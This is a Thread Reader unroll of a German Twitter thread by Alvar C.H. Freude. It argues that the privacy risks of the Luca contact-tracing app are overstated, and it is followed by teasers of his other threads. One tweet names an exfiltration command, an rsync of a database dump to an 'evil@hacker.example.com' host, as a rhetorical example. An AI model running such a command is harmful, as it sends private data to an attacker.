Share this page!

Alvar C.H. Freude Profile picture
Twitter logo
28 Jun, 7 tweets, 13 min read
@mame82 @HonkHase @LoeweHeinz @gnirbel @AllenRe97883617 @BergerPhilipp @patrick_hennig @_lucaApp Also, noch mal:
Datenschutz ist auch Risikomanagement. Es wird nicht per se davon ausgegangen, dass ein Anbieter inkriminiert ist, aber er hat dafür Maßnahmen zu treffen.

Das Risiko, dass ein Anbieter komplett und vollständig von Angreifern übernommen wird, ist zwar vorhanden,
@mame82 @HonkHase @LoeweHeinz @gnirbel @AllenRe97883617 @BergerPhilipp @patrick_hennig @_lucaApp […] aber man kann nicht sagen: wenn ein Angreifer den Diensteanbieter vollständig übernimmt, sind folgende Datenabgriffe möglich, also definieren wir: der Anbieter ist so sicher/unsicher, als wenn er vollständig übernommen wurde. […]
@mame82 @HonkHase @LoeweHeinz @gnirbel @AllenRe97883617 @BergerPhilipp @patrick_hennig @_lucaApp […] Also kann man nicht behaupten, dass die Nutzung einer App damit einhergeht, dass es los gehe „mit der Nachverfolgbarkeit, wer welche religiösen Einrichtungen besucht hat“, im Sinne von „da ist ein signifikantes Risiko, dass jeder Kirchgänger nachverfolgt wird“. […]
@mame82 @HonkHase @LoeweHeinz @gnirbel @AllenRe97883617 @BergerPhilipp @patrick_hennig @_lucaApp […] (Natürlich soll im Infektionsfall eine Nachverfolgung durchgeführt werden können, da gehe ich von explizit gewünscht aus, um die Diskussion nicht durch einen neuen Strang zu verkomplizieren) […]
@mame82 @HonkHase @LoeweHeinz @gnirbel @AllenRe97883617 @BergerPhilipp @patrick_hennig @_lucaApp […] Der obige Tweet von @HonkHase suggeriert, dass die Liste aller Besucher schlecht geschützt fast schon öffentlich im Internet stehe, oder auf Polizeicomputern für die nächsten 50 Jahre gespeichert werde.

Das ist aber falsch.

Natürlich muss nachgearbeitet werden. Aber […]
@mame82 @HonkHase @LoeweHeinz @gnirbel @AllenRe97883617 @BergerPhilipp @patrick_hennig @_lucaApp […] es ist nicht so, dass eine Verknüpfung stattfindet (das System unternimmt zahlreiche Versuche das Risiko zu minimieren) oder durch einen Angreifer mit einem simplen rsync /database/dump.xz evil@hacker.example.com:/dumps ausgelesen werden kann. Wenn überhaupt […]
@mame82 @HonkHase @LoeweHeinz @gnirbel @AllenRe97883617 @BergerPhilipp @patrick_hennig @_lucaApp […] sind wenige Teile mit hohem Aufwand rekonstruierbar, vielleicht. Vielleicht! Und da aber nicht rückwirkend sondern nur für die Zukunft.

Wie hoch ist das Risiko? Kann man in Ruhe diskutieren. Aber pauschale „Hilfe, wir gehen alle unter“-Behauptunen verstellen den Blick.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Alvar C.H. Freude

Alvar C.H. Freude Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @alvar_f

Alvar C.H. Freude Profile picture
25 Jul 20
Wer kennt jemanden, der 100 Millionen € Spielgeld übrig hat? Dann gründen wir ein Blockchain-KI-Gesundheits-Datenschutz-BigData-Krypto-Startup, stecken 5 Mio in repräsentative Büros, 20 Mio in Lobbyisten, 5 Mio investieren wir in Politiker (einschliesslich Bespaßung), […]
[…] für 3 Mio holen wir billige Programmierer und Designer, die aus freien Bibliotheken und mit Photoshop Demos zusammenbasteln, 10 Mio stecken wir in den Wasserkopf, 5 Mio sonstige laufende Kosten, für 30 kaufen wir irgendeine Firma mit ein paar namhaften Kunden auf, […]
[…] der Rest ist für unsere Mühen (ächz!). Von den Lobbyisten lassen wir irgendwelche Minister belabern, denen wir für 500 Mio € irgendeinen Scheiss Verkaufen. Das Zeug dafür kaufen wir wiederum woanders ein, dass wir selbst nur Frickelkram-Pfusch haben merkt ja keiner, […]
Read 4 tweets
Alvar C.H. Freude Profile picture
2 Jun 20
Habe mir den Datenbank-Code der Corona-Warn-App angeschaut. An den paar Zeilen kann man beispielhaft zeigen, was bei vielen Datenbank-Projekten nicht ganz optimal läuft. Ein Thread über Datenbank-Sicherheit, #SQL, die Corona-App und #PostgreSQL. #CoronaWarnApp #cwa 1/x
Kurzzusammenfassung: Die Datenbank-Berechtigungen sind viel zu weitgehend, ein erfolgreicher Angreifer könnte auf alle Daten zugreifen, löschen usw. Außerdem werden Datum und Zeit als Zahl gespeichert, unschön, denn es gibt einen TIMESTAMP-Datentyp! Und was ist mit der ID? 2/x
Bei den Berechtigungen könnte man einwenden: ein Angreifer darf nicht so weit kommen; aber das passiert leider immer wieder, und man kann sich mit einfachen Methoden schützen. Sieht auf den ersten Blick kompliziert aus, ist aber ganz simpel. Kommentare Willkommen! Also los: 3/x
Read 31 tweets
Alvar C.H. Freude Profile picture
4 Nov 19
Mehr Unterstützung nötig, IT-Sicherheit teilweise mangelhaft: Ergebnisse der #DSGVO Datenschutz-Umfrage des @lfdi_bw unter allen 1101 baden-württembergischen Gemeinden sind da: baden-wuerttemberg.datenschutz.de/gemeinden-umfr… – Viele Erkenntnisse, ein Thread nicht nur für #Teamdatenschutz und #Hacker 1/x
2/x „die umfrage ist genauso sinnlos, wie der ganze Datenschutzquatsch. Wir verwalten uns zu tode.“ – diese Meinung war die Ausnahme. Bei der Umfrage haben sich über 80 % der baden-württembergischen Gemeinden beteiligt, nur 12 % haben trotz mehrfacher Aufforderung nicht reagiert.
3/x Zur IT-Sicherheit: „Alle Datenträger befinden sich in mit Schlüsseln abschließbaren Räumen“ ist eine interessante Antwort auf die Frage nach Festplatten-Verschlüsselung, ebenso „Rekonstruktion der Daten nach Auflösung des RAID ist quasi ausgeschlossen“ baden-wuerttemberg.datenschutz.de/gemeinden-umfr…
Read 12 tweets
Alvar C.H. Freude Profile picture
1 Sep 19
„Warum sind diese Botschaften auf fruchtbaren Boden gefallen?“ fragt #Haseloff bei #AnneWill bzgl. der #AfD und der #LTW19. Nun, da stellt sich ja erst mal die Frage: welche Botschaften? Und da sieht man: lauter trivialer Mist, den jeder Dorfdepp nachplappern kann. 1/x
2/14: „Die bösen Ausländer“ kann jeder kreischen. Trivial. „Die bösen Politiker (außer uns)“ auch. Leute beschimpfen, die eh keiner mag: super-trivial. Kann alles jeder Dorfdepp. „Die blöde Greta will uns unseren Diesel wegnehmen“: Simpel, ebenso „Schaut mal, das hässliche Weib!“
3/14 „Die wollen uns zensieren, wir dürfen unsere Meinung nicht sagen!!!!“ ist genauso einfach. „Die Medien mögen uns nicht“ ist schnell gesagt – aber warum sollten die Medien auch Politiker mögen, die nur unterkomplexes Zeug nachplappern und sonst keine Konzepte haben?
Read 15 tweets
Alvar C.H. Freude Profile picture
23 Mar 19
1) Wie zu erwarten war: schon der bisherige #Uploadfilter von YouTube hat bei mir wieder zugeschlagen. Zu Unrecht, denn die Nutzung ist nach §57, 50 UrhG erlaubt, selbst wenn das erkannte Werk stimmen sollte. Im Screenshot sieht man die Info-Seite zu dem Claim – relativ harmlos.
2) Aber nicht immer ist es so relativ harmlos wie hier (oft wird gesperrt) – abgesehen davon, dass die Nutzung nach §§ 57, 50 UrhG erlaubt ist, selbst wenn das gefundene Werk passen sollte. Nun muss ich raussuchen, ob das Werk überhaupt vorkommt und dann Widerspruch einlegen.
3) Widerspruch entweder, weil das Werk gar nicht vorkommt (sondern vielleicht beide nur den gleichen Schnippsel nutzen), oder weil es eben nach deutschem Urheberrecht (noch) erlaubt ist. Und was sagt @AxelVossMdEP dazu? #Artikel13 #Artikel13Demo #Artikel17
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!

Like this author's thread?

Get emails when @alvar_f has new unrolls!

Check out other threads from @alvar_f!

Read all threads by @alvar_f

:(